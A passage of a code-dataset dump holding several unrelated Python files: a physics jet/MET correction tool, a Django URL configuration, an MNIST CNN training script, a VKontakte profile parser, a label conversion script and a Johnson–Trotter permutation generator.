file:\n lines = file.read().split(\"\\n\")\n sources = filter(lambda x: x.startswith(\"[\") and x.endswith(\"]\"), lines)\n sources = map(lambda x: x[1:-1], sources)\n jesUncertainties = sources\n \n # CREATE JES uncertainties\n print(\"Loading JES uncertainties from file '%s'...\"%filename_JES)\n #jesUncertainty = JetCorrectionUncertainty(filename_JES)\n # implementation didn't seem to work for factorized JEC, try again another way\n for uncertainty in jesUncertainties:\n unclabel = '' if uncertainty=='Total' and 
len(jesUncertainties)==1 else uncertainty\n pars = JetCorrectorParameters(filename_JES,unclabel)\n jesUncertainty[uncertainty] = JetCorrectionUncertainty(pars)\n \n self.year = year\n self.globalTag = globalTag\n self.jetType = jetType\n self.metType = metType\n self.isData = isData\n self.era = era\n self.redoJEC = redoJEC\n ###self.doJER = doJER\n self.doSystematics = doSystematics\n self.noGroom = noGroom\n self.updateEvent = updateEvent\n self.jesUncertainties = jesUncertainties # list\n self.jesUncertainty = jesUncertainty # dictionary\n self.path_JES = path_JES\n self.filename_JES = filename_JES\n self.jmr_vals = jmr_vals\n self.jetSmearer = jetSmearer\n self.jetReCalibrator = jetReCalibrator\n self.correctJetMET = self.correctJetMET_Data if isData else self.correctJetMET_MC\n \n \n def endJob(self):\n ###\"\"\"Clean the temporary directories after the job is finished.\"\"\"\n ###if '/tmp/' in self.path_JES[:5]:\n ### print('JetSmearer.endJob: Removing \"%s\"...'%self.path_JES)\n ### os.rmdir(self.path_JES)\n ###self.jetSmearer.endJob()\n pass\n \n \n def correctJetMET_Data(self, event):\n \"\"\"Process data event.\"\"\"\n ###print \">>> %8s \"%event.event + '-'*80\n \n # NOMINAL VALUES\n jets_pt_nom = [ ]\n if self.corrMET:\n met = Object(event, self.metBranchName)\n met_px_nom, met_py_nom = met.pt*cos(met.phi), met.pt*sin(met.phi)\n \n # APPLY JEC per jet\n jets = Collection(event, self.jetBranchName )\n rho = getattr(event, self.rhoBranchName)\n for jet in jets:\n \n # RAW VALUES\n jet_pt0 = jet.pt\n if hasattr(jet,'rawFactor'):\n jet_pt_raw = jet_pt0 * (1 - jet.rawFactor)\n else:\n jet_pt_raw = -1.0 * jet_pt0 # if factor not present factor will be saved as -1\n \n # CALIBRATE - apply JES corrections\n if self.redoJEC:\n jet_pt_nom, jet_mass_nom = self.jetReCalibrator.correct(jet,rho)\n jet.pt = jet_pt_nom\n jet.mass = jet_mass_nom\n else:\n jet_pt_nom = jet.pt\n jet_mass_nom = jet.mass\n jets_pt_nom.append(jet_pt_nom)\n ###print \"%10.4f %10.4f %10.5f %10.5f\"%(jet_pt_raw,jet_pt_nom,jet.eta,jet.rawFactor)\n ###print \"%10.4f %8.4f %8.4f %10.6f %10.6f\"%(jet_pt_raw, jet_pt0, jet_pt_nom, jet.rawFactor, jet_pt_nom/jet_pt_raw-1.)\n \n #### UPDATE JET in event\n ###if self.updateEvent:\n ### getattr(event,self.jetBranchName+'_pt')[jet._index] = jet_pt_nom\n \n # PROPAGATE JES corrections to MET\n if self.corrMET and jet_pt_nom > self.unclEnThreshold:\n jet_cosPhi = cos(jet.phi)\n jet_sinPhi = sin(jet.phi)\n met_px_nom = met_px_nom - (jet_pt_nom - jet_pt0)*jet_cosPhi\n met_py_nom = met_py_nom - (jet_pt_nom - jet_pt0)*jet_sinPhi\n \n # PREPARE MET for return\n if self.corrMET:\n met_nom = TLorentzVector(met_px_nom,met_py_nom,0,sqrt(met_px_nom**2+met_py_nom**2))\n ###if self.updateEvent:\n ### setattr(event,self.metBranchName+'_pt', met_vars['nom'].Pt())\n ### setattr(event,self.metBranchName+'_phi', met_vars['nom'].Phi())\n return jets_pt_nom, met_nom\n \n return jets_pt_nom\n \n \n \n def correctJetMET_MC(self, event):\n \"\"\"Process event, apply corrections.\"\"\"\n ###print \">>> %8s \"%event.event + '-'*80\n \n ###if self.doGroomed:\n ### subJets = Collection(event, self.subJetBranchName )\n ### genSubJets = Collection(event, self.genSubJetBranchName )\n ### genSubJetMatcher = matchObjectCollectionMultiple( genJets, genSubJets, dRmax=0.8 )\n \n jets_pt_nom = [ ]\n ###jets_mass_nom = [ ]\n if self.doSystematics:\n jets_pt_jerUp = [ ]\n jets_pt_jerDown = [ ]\n jets_pt_jesUp = { }\n jets_pt_jesDown = { }\n ###jets_mass_jerUp = [ ]\n ###jets_mass_jerDown = [ ]\n ###jets_mass_jmrUp = [ 
]\n ###jets_mass_jmrDown = [ ]\n ###jets_mass_jesUp = { }\n ###jets_mass_jesDown = { }\n ###jets_mass_jmsUp = [ ]\n ###jets_mass_jmsDown = [ ]\n for uncertainty in self.jesUncertainties:\n jets_pt_jesUp[uncertainty] = [ ]\n jets_pt_jesDown[uncertainty] = [ ]\n ###jets_mass_jesUp[uncertainty] = [ ]\n ###jets_mass_jesDown[uncertainty] = [ ]\n \n if self.corrMET:\n met = Object(event, self.metBranchName)\n met_px, met_py = met.pt*cos(met.phi), met.pt*sin(met.phi)\n met_px_nom, met_py_nom = met_px, met_py\n met_px_jerUp, met_py_jerUp = met_px, met_py\n met_px_jerDown, met_py_jerDown = met_px, met_py\n met_px_jesUp, met_py_jesUp = { }, { }\n met_px_jesDown, met_py_jesDown = { }, { }\n for uncertainty in self.jesUncertainties:\n met_px_jesUp[uncertainty] = met_px\n met_py_jesUp[uncertainty] = met_py\n met_px_jesDown[uncertainty] = met_px\n met_py_jesDown[uncertainty] = met_py\n \n ###if self.doGroomed:\n ### jets_msdcorr_nom = [ ]\n ### if self.doSystematics:\n ### jets_msdcorr_jerUp = [ ]\n ### jets_msdcorr_jerDown = [ ]\n ### jets_msdcorr_jmrUp = [ ]\n ### jets_msdcorr_jmrDown = [ ]\n ### jets_msdcorr_jesUp = { }\n ### jets_msdcorr_jesDown = { }\n ### jets_msdcorr_jmsUp = [ ]\n ### jets_msdcorr_jmsDown = [ ]\n ### for uncertainty in self.jesUncertainties:\n ### jets_msdcorr_jesUp[uncertainty] = [ ]\n ### jets_msdcorr_jesDown[uncertainty] = [ ]\n \n # MATCH reconstructed jets to generator level ones\n # (needed to evaluate JER scale factors and uncertainties)\n jets = Collection(event, self.jetBranchName)\n genJets = Collection(event, self.genJetBranchName)\n rho = getattr(event, self.rhoBranchName)\n pairs = matchObjectCollection(jets, genJets)\n # APPLY JEC per jet\n for jet in jets:\n genJet = pairs[jet]\n \n ###if self.doGroomed:\n ### genGroomedSubJets = genSubJetMatcher[genJet] if genJet!=None else None\n ### genGroomedJet = genGroomedSubJets[0].p4() + genGroomedSubJets[1].p4() if genGroomedSubJets!=None and len(genGroomedSubJets)>=2 else None\n ### if jet.subJetIdx1>=0 and jet.subJetIdx2>=0:\n ### groomedP4 = subJets[ jet.subJetIdx1 ].p4() + subJets[ jet.subJetIdx2].p4()\n ### else:\n ### groomedP4 = None\n \n # RAW VALUES\n jet_pt0 = jet.pt\n ###jet_mass0 = jet.mass\n if hasattr(jet,'rawFactor'):\n jet_pt_raw = jet_pt0 * (1 - jet.rawFactor)\n ###jet_mass_raw = jet.mass * (1 - jet.rawFactor)\n else:\n jet_pt_raw = -1.0 * jet_pt0 # if factor not present factor will be saved as -1\n ###jet_mass_raw = -1.0 * jet.mass\n \n # CALIBRATE - apply JES corrections\n if self.redoJEC:\n jet_pt, jet_mass = self.jetReCalibrator.correct(jet,rho)\n jet.pt = jet_pt\n jet.mass = jet_mass\n else:\n jet_pt = jet.pt\n jet_mass = jet.mass\n \n # SMEAR - apply JER SF\n if self.doSystematics:\n smear_jer, smear_jerUp, smear_jerDown = self.jetSmearer.smearPt(jet,genJet,rho)\n else:\n smear_jer = self.jetSmearer.smearPt(jet,genJet,rho)[0]\n jet_pt_nom = smear_jer*jet_pt\n if jet_pt_nom<0.0:\n jet_pt_nom *= -1.0\n jets_pt_nom.append(jet_pt_nom)\n ###print \"%8.4f %8.4f %8.4f %8.4f %8.4f %8.4f\"%(jet_pt_raw, jet_pt0, jet_pt, jet_pt_nom, jet.rawFactor, smear_jer)\n \n #### SMEAR JMS and JMR scale factors\n ###jmsNomVal = self.jmsVals[0]\n ###jmsDownVal = self.jmsVals[1]\n ###jmsUpVal = self.jmsVals[2]\n ###smear_jmr, smear_jmrUp, smear_jmrDown = self.jetSmearer.smearMass(jet, genJet)\n ###jet_mass_nom = smear_jer*smear_jmr*jmsNomVal*jet.mass\n ###if jet_mass_nom < 0.0:\n ### jet_mass_nom *= -1.0\n ###jets_mass_nom .append(jet_mass_nom)\n \n #### CORRECT GROOMED JETS\n ###if self.doGroomed:\n ### ( 
jet_msdcorr_jmrNomVal, jet_msdcorr_jmrUpVal, jet_msdcorr_jmrDownVal ) = self.jetSmearer.getSmearValsM(groomedP4, genGroomedJet) if groomedP4!=None and genGroomedJet!=None else (0.,0.,0.)\n ### jet_msdcorr_raw = groomedP4.M() if groomedP4!=None else 0.0\n ### if jet_msdcorr_raw < 0.0:\n ### jet_msdcorr_raw *= -1.0\n ### jet_msdcorr_nom = smear_jer*jet_msdcorr_jmrNomVal*jet_msdcorr_raw\n ### jets_msdcorr_nom .append(jet_msdcorr_nom)\n \n #### UPDATE JET in event (unreliable)\n ###if self.updateEvent:\n ### getattr(event,self.jetBranchName+'_pt')[jet._index] = jet_pt_nom\n ### ###getattr(event,self.jetBranchName+'_mass')[jet._index] = jet_mass_nom\n \n # EVALUATE JEC uncertainties\n if self.doSystematics:\n \n # EVALUATE JES uncertainties\n jet_pt_jesUp = { }\n jet_pt_jesDown = { }\n for uncertainty in self.jesUncertainties:\n # (cf. https://twiki.cern.ch/twiki/bin/view/CMSPublic/WorkBookJetEnergyCorrections#JetCorUncertainties )\n self.jesUncertainty[uncertainty].setJetPt(jet_pt_nom)\n self.jesUncertainty[uncertainty].setJetEta(jet.eta)\n delta = self.jesUncertainty[uncertainty].getUncertainty(True)\n jet_pt_jesUp[uncertainty] = jet_pt_nom*(1.+delta)\n jet_pt_jesDown[uncertainty] = jet_pt_nom*(1.-delta)\n jets_pt_jesUp[uncertainty] .append(jet_pt_jesUp[uncertainty])\n jets_pt_jesDown[uncertainty].append(jet_pt_jesDown[uncertainty])\n ###jet_mass_jesUp [uncertainty] = jet_mass_nom*(1. + delta)\n ###jet_mass_jesDown [uncertainty] = jet_mass_nom*(1. - delta)\n ###jets_mass_jesUp [uncertainty].append(jet_mass_jesUp[uncertainty])\n ###jets_mass_jesDown[uncertainty].append(jet_mass_jesDown[uncertainty])\n ###if self.doGroomed:\n ### jet_msdcorr_jesUp [uncertainty] = jet_msdcorr_nom*(1. + delta)\n ### jet_msdcorr_jesDown [uncertainty] = jet_msdcorr_nom*(1. - delta)\n ### jets_msdcorr_jesUp [uncertainty].append(jet_msdcorr_jesUp[uncertainty])\n ### jets_msdcorr_jesDown[uncertainty].append(jet_msdcorr_jesDown[uncertainty])\n \n # EVALUATE JER uncertainties\n jet_pt_jerUp = smear_jerUp*jet_pt\n jet_pt_jerDown = smear_jerDown*jet_pt\n jets_pt_jerUp .append(jet_pt_jerUp)\n jets_pt_jerDown.append(jet_pt_jerDown)\n \n #### EVALUATE JMS and JMR uncertainties\n ###jet_mass_jesUp = { }\n ###jet_mass_jesDown = { }\n ###jet_mass_jmsUp = [ ]\n ###jet_mass_jmsDown = [ ]\n ###jets_mass_jerUp .append(smear_jerUp *smear_jmr *jmsNomVal *jet.mass)\n ###jets_mass_jerDown.append(smear_jerDown*smear_jmr *jmsNomVal *jet.mass)\n ###jets_mass_jmrUp .append(smear_jer *smear_jmrUp *jmsNomVal *jet.mass)\n ###jets_mass_jmrDown.append(smear_jer *smear_jmrDown*jmsNomVal *jet.mass)\n ###jets_mass_jmsUp .append(smear_jer *smear_jmr *jmsUpVal *jet.mass)\n ###jets_mass_jmsDown.append(smear_jer *smear_jmr *jmsDownVal*jet.mass)\n \n ###if self.doGroomed:\n ### jet_msdcorr_jmsUp = [ ]\n ### jet_msdcorr_jmsDown = [ ]\n ### jet_msdcorr_jesUp = { }\n ### jet_msdcorr_jesDown = { }\n ### jets_msdcorr_jerUp .append(smear_jerUp *jet_msdcorr_jmrNomVal *jmsNomVal *jet_msdcorr_raw)\n ### jets_msdcorr_jerDown.append(smear_jerDown*jet_msdcorr_jmrNomVal *jmsNomVal *jet_msdcorr_raw)\n ### jets_msdcorr_jmrUp .append(smear_jer *jet_msdcorr_jmrUpVal *jmsNomVal *jet_msdcorr_raw)\n ### jets_msdcorr_jmrDown.append(smear_jer *jet_msdcorr_jmrDownVal*jmsNomVal *jet_msdcorr_raw)\n ### jets_msdcorr_jmsUp .append(smear_jer *jet_msdcorr_jmrNomVal *jmsUpVal *jet_msdcorr_raw)\n ### jets_msdcorr_jmsDown.append(smear_jer *jet_msdcorr_jmrNomVal *jmsDownVal *jet_msdcorr_raw)\n \n # PROPAGATE JER and JES corrections and uncertainties to MET\n if self.corrMET and 
jet_pt_nom > self.unclEnThreshold:\n jet_cosPhi = cos(jet.phi)\n jet_sinPhi = sin(jet.phi)\n ###print \"%8.4f - met_px_nom = met_px_nom - (jet_pt_nom - jet_pt0)*jet_cosPhi = %8.4f - (%8.4f - %8.4f)*%8.4f = %8.4f\"%(jet.phi,met_px_nom,jet_pt_nom,jet_pt0,jet_cosPhi,met_px_nom-(jet_pt_nom-jet_pt0)*jet_cosPhi)\n met_px_nom = met_px_nom - (jet_pt_nom - jet_pt0)*jet_cosPhi\n ###print \"%8.4f - met_py_nom = met_py_nom - (jet_pt_nom - jet_pt0)*jet_sinPhi = %8.4f - (%8.4f - %8.4f)*%8.4f = %8.4f\"%(jet.phi,met_py_nom,jet_pt_nom,jet_pt0,jet_sinPhi,met_py_nom-(jet_pt_nom-jet_pt0)*jet_sinPhi)\n met_py_nom = met_py_nom - (jet_pt_nom - jet_pt0)*jet_sinPhi\n if self.doSystematics:\n met_px_jerUp = met_px_jerUp - (jet_pt_jerUp - jet_pt0)*jet_cosPhi\n met_py_jerUp = met_py_jerUp - (jet_pt_jerUp - jet_pt0)*jet_sinPhi\n met_px_jerDown = met_px_jerDown - (jet_pt_jerDown - jet_pt0)*jet_cosPhi\n met_py_jerDown = met_py_jerDown - (jet_pt_jerDown - jet_pt0)*jet_sinPhi\n for uncertainty in self.jesUncertainties:\n met_px_jesUp[uncertainty] = met_px_jesUp[uncertainty] - (jet_pt_jesUp[uncertainty] - jet_pt0)*jet_cosPhi\n met_py_jesUp[uncertainty] = met_py_jesUp[uncertainty] - (jet_pt_jesUp[uncertainty] - jet_pt0)*jet_sinPhi\n met_px_jesDown[uncertainty] = met_px_jesDown[uncertainty] - (jet_pt_jesDown[uncertainty] - jet_pt0)*jet_cosPhi\n met_py_jesDown[uncertainty] = met_py_jesDown[uncertainty] - (jet_pt_jesDown[uncertainty] - jet_pt0)*jet_sinPhi\n \n #### CHECKS\n ###print \">>> %2d: jet.pt, jet_pt, corr_factor, smear_factor = %8.3f, %8.3f, %8.4f, %8.4f\"%(jet._index,jet.pt,jet_pt,jet_pt/jet_pt_raw,smear_factor)\n ###print \">>> %2s jet_pt_jerUp, jet_pt_nom, jet_pt_jerDown = %8.3f, %8.3f, %8.3f\"%(\"\",jet_pt_jerUp,jet_pt_nom,jet_pt_jerDown)\n ###print \">>> %2s jet_pt_jesUp, jet_pt_nom, jet_pt_jesDown = %8.3f, %8.3f, %8.3f\"%(\"\",jet_pt_jesUp['Total'],jet_pt_nom,jet_pt_jesDown['Total'])\n \n # PREPARE JET PT variations for return; save 'Total' as just jesUp/jesDown\n if self.doSystematics:\n jetpt_vars = { 'nom': jets_pt_nom, 'jerUp': jets_pt_jerUp, 'jerDown': jets_pt_jerDown }\n for uncertainty in self.jesUncertainties:\n jetpt_vars[\"jes%sUp\"%uncertainty.replace('Total','')] = jets_pt_jesUp[uncertainty]\n jetpt_vars[\"jes%sDown\"%uncertainty.replace('Total','')] = jets_pt_jesDown[uncertainty]\n else:\n jetpt_vars = { 'nom': jets_pt_nom, }\n \n if self.corrMET:\n \n # PREPARE MET for return\n ###print \"met_px_nom = %8.4f\"%(met_px_nom)\n ###print \"met_py_nom = %8.4f\"%(met_py_nom)\n met_vars = { 'nom': TLorentzVector(met_px_nom,met_py_nom,0,sqrt(met_px_nom**2+met_py_nom**2)) }\n \n #### UPDATE MET in event\n ###if self.updateEvent:\n ### setattr(event,self.metBranchName+'_pt', met_vars['nom'].Pt())\n ### setattr(event,self.metBranchName+'_phi', met_vars['nom'].Phi())\n \n if self.doSystematics:\n \n # EVALUATE UNCLUSTERED ENERGY uncertainties\n met_deltaPx_unclEn = getattr(event,self.metBranchName+\"_MetUnclustEnUpDeltaX\")\n met_deltaPy_unclEn = getattr(event,self.metBranchName+\"_MetUnclustEnUpDeltaY\")\n met_px_unclEnUp = met_px_nom + met_deltaPx_unclEn\n met_py_unclEnUp = met_py_nom + met_deltaPy_unclEn\n met_px_unclEnDown = met_px_nom - met_deltaPx_unclEn\n met_py_unclEnDown = met_py_nom - met_deltaPy_unclEn\n \n # PREPARE MET variations for return\n met_vars['jesUp'] = { }\n met_vars['jesDown'] = { }\n met_vars['jerUp'] = TLorentzVector(met_px_jerUp, met_py_jerUp, 0,sqrt(met_px_jerUp**2 +met_py_jerUp**2))\n met_vars['jerDown'] = TLorentzVector(met_px_jerDown, met_py_jerDown, 0,sqrt(met_px_jerDown**2 
+met_py_jerDown**2))\n met_vars['unclEnUp'] = TLorentzVector(met_px_unclEnUp, met_py_unclEnUp, 0,sqrt(met_px_unclEnUp**2 +met_py_unclEnUp**2))\n met_vars['unclEnDown'] = TLorentzVector(met_px_unclEnDown,met_py_unclEnDown,0,sqrt(met_px_unclEnDown**2+met_py_unclEnDown**2))\n for uncertainty in self.jesUncertainties:\n met_vars[\"jes%sUp\"%uncertainty.replace('Total','')] = TLorentzVector(met_px_jesUp[uncertainty], met_py_jesUp[uncertainty],\n 0,sqrt(met_px_jesUp[uncertainty]**2 +met_py_jesUp[uncertainty]**2))\n met_vars[\"jes%sDown\"%uncertainty.replace('Total','')] = TLorentzVector(met_px_jesDown[uncertainty],met_py_jesDown[uncertainty],\n 0,sqrt(met_px_jesDown[uncertainty]**2+met_py_jesDown[uncertainty]**2))\n \n return jetpt_vars, met_vars\n \n return jetpt_vars\n \n","sub_path":"corrections/JetMETCorrectionTool.py","file_name":"JetMETCorrectionTool.py","file_ext":"py","file_size_in_byte":29193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"271995013","text":"from django.conf.urls import include, url\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'conta_bancaria.views.home', name='home'),\n url(r'^$', 'contas.views.home', name='home'),\n url(r'^contas/$', 'contas.views.contas', name='contas'),\n url(r'^planos/$', 'contas.views.planos', name='planos'),\n url(r'^criar-conta/$', 'contas.views.nova_conta', name='nova_conta'),\n url(r'^criar-plano/$', 'contas.views.novo_plano', name='novo_plano'),\n]\n","sub_path":"contas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"395633631","text":"from __future__ import print_function\nimport torch.nn as nn\nimport csv\nfrom itertools import zip_longest\nimport argparse\nimport torch\nfrom training_routines import train, test\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\n\nclass MnistCNN(nn.Module):\n def __init__(self):\n super(MnistCNN, self).__init__()\n self.conv1 = nn.Conv2d(1, 20, 5, 1)\n self.conv2 = nn.Conv2d(20, 50, 5, 1)\n self.fc1 = nn.Linear(4 * 4 * 50, 500)\n self.fc2 = nn.Linear(500, 10)\n\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv2(x))\n x = F.max_pool2d(x, 2, 2)\n x = x.view(-1, 4 * 4 * 50)\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n return x\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='PyTorch MNIST Example')\n parser.add_argument('--batch-size', type=int, default=64, metavar='N',\n help='input batch size for training (default: 64)')\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\n help='input batch size for testing (default: 1000)')\n parser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.01, metavar='LR',\n help='learning rate (default: 0.01)')\n parser.add_argument('--momentum', type=float, default=0.5, metavar='M',\n help='SGD momentum (default: 0.5)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n\n parser.add_argument('--save-model', 
action='store_true', default=False,\n help='For Saving the current Model')\n args = parser.parse_args()\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n torch.manual_seed(args.seed)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.test_batch_size, shuffle=True, **kwargs)\n\n model = MnistCNN().to(device)\n optimizer = optim.Adam(model.parameters(), lr=args.lr)\n\n test_accuracy = []\n train_accuracy = []\n\n for epoch in range(1, args.epochs + 1):\n train(args, model, device, train_loader, optimizer, epoch)\n test(args, model, device, test_loader, train_loader, test_accuracy, train_accuracy)\n\n d = [train_accuracy, test_accuracy]\n export_data = zip_longest(*d, fillvalue='')\n with open('../model/mnist_cnn_report.csv', 'w', encoding=\"ISO-8859-1\", newline='') as report_file:\n wr = csv.writer(report_file)\n wr.writerow((\"Train accuracy\", \"Test accuracy\"))\n wr.writerows(export_data)\n report_file.close()\n\n if (args.save_model):\n torch.save(model.state_dict(), \"../model/mnist_cnn.pt\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/mnist_cnn.py","file_name":"mnist_cnn.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103122524","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom components.parser import Parser\nfrom components.person import Person\n\nclass VkontakteParser(Parser):\n def __init__(self):\n Parser.__init__(self)\n self.person = None\n\n def parse(self, id, html):\n self.person = Person()\n self.person.id = id\n self.get_avatar_url(html)\n self.get_names(html)\n self.get_gender(html)\n self.get_status(html)\n self.get_birthday(html)\n self.get_town(html)\n self.get_religion(html)\n self.get_politic(html)\n self.get_icq(html)\n self.get_university(html)\n self.get_faculty(html)\n self.get_chair(html)\n self.get_edu_form(html)\n self.person.friends = self.core.get_friends(self.person.id)\n return self.person\n\n def get_avatar_url(self, html):\n \"\"\"Gets person avatar url.\"\"\"\n\n match = re.search(r'div id=.leftColumn.>[^<]*
' \\\n '[^<]*', html)\n if match:\n self.person.avatar_url = match.group(1)\n\n def get_names(self, html):\n \"\"\"Gets person firstName, secondName, nickName.\"\"\"\n\n match = re.search(r'profileName.>[^<]*

(\\D+)

[^<]*
', html)\n if match:\n idents = match.group(1).split()\n if len(idents) == 3:\n self.person.name, self.person.nickname, self.person.sname = tuple(idents)\n else:\n self.person.name, self.person.sname = tuple(idents)\n \n def get_gender(self, html):\n \"\"\"Gets person gender.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[sex\\]=..>(\\D+)' \\\n '', html)\n if match:\n self.person.gender = match.group(1)\n\n def get_status(self, html):\n \"\"\"Gets person marital status.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[status\\]=..>(\\D+)' \\\n '', html)\n if match:\n self.person.status = match.group(1)\n\n def get_birthday(self, html):\n \"\"\"Gets person birth day, month and year.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[bday\\]=(\\d+)\\&' \\\n 'c\\[bmonth\\]=(\\d+).>', html)\n if match:\n self.person.bday = int(match.group(1))\n self.person.bmonth = int(match.group(2))\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[byear\\]=(\\d+).>', html)\n if match:\n self.person.byear = int(match.group(1))\n \n def get_town(self, html):\n \"\"\"Gets person home town.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[hometown\\]=[^>]+>' \\\n '([^<]+)', html)\n if match:\n self.person.town = match.group(1)\n\n def get_religion(self, html):\n \"\"\"Gets person religion status.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[religion\\]=' \\\n '([^>]+).\\>', html)\n if match:\n self.person.religion = match.group(1)\n\n def get_politic(self, html):\n \"\"\"Gets person politic status.\"\"\"\n\n politic = re.search( \\\n r'gsearch\\.php\\?from=people\\&c\\[politic\\]=..>([^<]+)', html)\n if politic:\n self.person.politic = politic.group(1)\n\n def get_icq(self, html):\n \"\"\"Gets person ICQ id.\"\"\"\n\n match = re.search(r'class=.label.>ICQ:[^<]*' \\\n '[^<]*
([^<]*)', html)\n if match:\n number = re.search(r'(\\d+-\\d+-\\d+|\\d+)', match.group(1))\n if number:\n self.person.icq = number.group(1).replace('-', '')\n\n def get_university(self, html):\n \"\"\"Gets person university name.\"\"\"\n\n match = re.search(r'gsearch.php\\?from=people\\&c\\[uni_country\\]=\\d+\\&' \\\n 'c\\[uni_city\\]=\\d+\\&c\\[university\\]=\\d+.>([^<]+)', html)\n if match:\n self.person.university = match.group(1)\n\n def get_faculty(self, html):\n \"\"\"Gets faculty name.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[uni_country\\]=\\d+\\&c' \\\n '\\[uni_city\\]=\\d+\\&c\\[university\\]=\\d+\\&c\\[faculty\\]=\\d+.>([^<]+)<' \\\n '/a\\>', html)\n if match:\n self.person.faculty = match.group(1)\n\n def get_chair(self, html):\n \"\"\"Gets chair name.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[uni_country\\]=\\d+\\&c' \\\n '\\[uni_city\\]=\\d+\\&c\\[university\\]=\\d+\\&c\\[faculty\\]=\\d+\\&c\\[chair\\]' \\\n '=\\d+.>([^<]+)', html)\n if match:\n self.person.chair = match.group(1)\n\n def get_edu_form(self, html):\n \"\"\"Gets person education form.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[uni_country\\]=\\d+\\&c' \\\n '\\[uni_city\\]=\\d+\\&c\\[university\\]=\\d+\\&c\\[edu_form\\]=\\d+.>([^<]+)' \\\n '', html)\n if match:\n self.person.edu_form = match.group(1)\n\n","sub_path":"vkontakte/vparser.py","file_name":"vparser.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"167842935","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCopyright 2019 TIANJI, Inc. All Rights Reserved.\n@author: HuHui\n@software: PyCharm\t\n@project: AttentionOCR\t\n@file: transform_labels.py\n@version: v1.0\n@time: 2019/12/8 4:20 PM\n@setting: \n-------------------------------------------------\nDescription :\nProject file notes: \n\"\"\"\n\nimport pickle\nimport os\n\nlabel_path = '/data/models/qmsb/v2/merge_3228_label.pkl'\nout_file = os.path.join(os.path.dirname(__file__), 'label.txt')\nf_out = open(out_file, 'w')\nf = open(label_path, 'rb')\n# alphabet = ''.join(pickle.load(f).keys())\nlabel_dict = pickle.load(f)\nfor i in range(len(label_dict)):\n character = list(label_dict.keys())[list(label_dict.values()).index(i)]\n f_out.write('{} {}\\n'.format(i, character))\nf_out.write('{} EOS\\n'.format(i + 1))\nf.close()\nf_out.close()\n","sub_path":"qmsb/transform_labels.py","file_name":"transform_labels.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"400473810","text":"n = int(input(\"Enter n: \"))\nsequence=[]\n\n# initialize the first permutation\nfor i in range(1,n+1):\n sequence.append(i)\nprint(sequence)\n\n# create an auxiliary 2D array whose elements look like [-1, n],\n# where -1 means the arrow points left (1 means right)\nindices = range(1, n+1)\nstate = [[-1, idx] for idx in indices]\nstate = [[-1, n+1]] + state + [[-1, n+1]]\n\nwhile True:\n # 1. Find the largest mobile number\n mobile = -1\n for idx in indices: #1, 2 ... 
n\n direction, value = state[idx]\n if value > mobile and value > state[idx+direction][1]:\n # the number is mobile and larger than the previous mobile number\n mobile = value\n mobile_index = idx\n mobile_direction = direction\n if mobile == n:\n break\n if mobile == -1:\n # no mobile numbers left, i.e. all permutations have been generated\n break\n\n # 2. Swap the mobile number with the neighbour its arrow points to\n sees = mobile_index + mobile_direction\n # update the auxiliary permutation state (the 2-D array)\n state[mobile_index], state[sees] = state[sees], state[mobile_index]\n # update the permutation itself\n sequence[mobile_index-1], sequence[sees-1] = sequence[sees-1], sequence[mobile_index-1]\n print(sequence)\n\n # 3. Reverse the arrows of all numbers larger than the mobile number\n if mobile < n:\n for idx in indices:\n if state[idx][1] > mobile:\n state[idx][0] = -state[idx][0]","sub_path":"Jonson-TrottersAlgorithm.py","file_name":"Jonson-TrottersAlgorithm.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
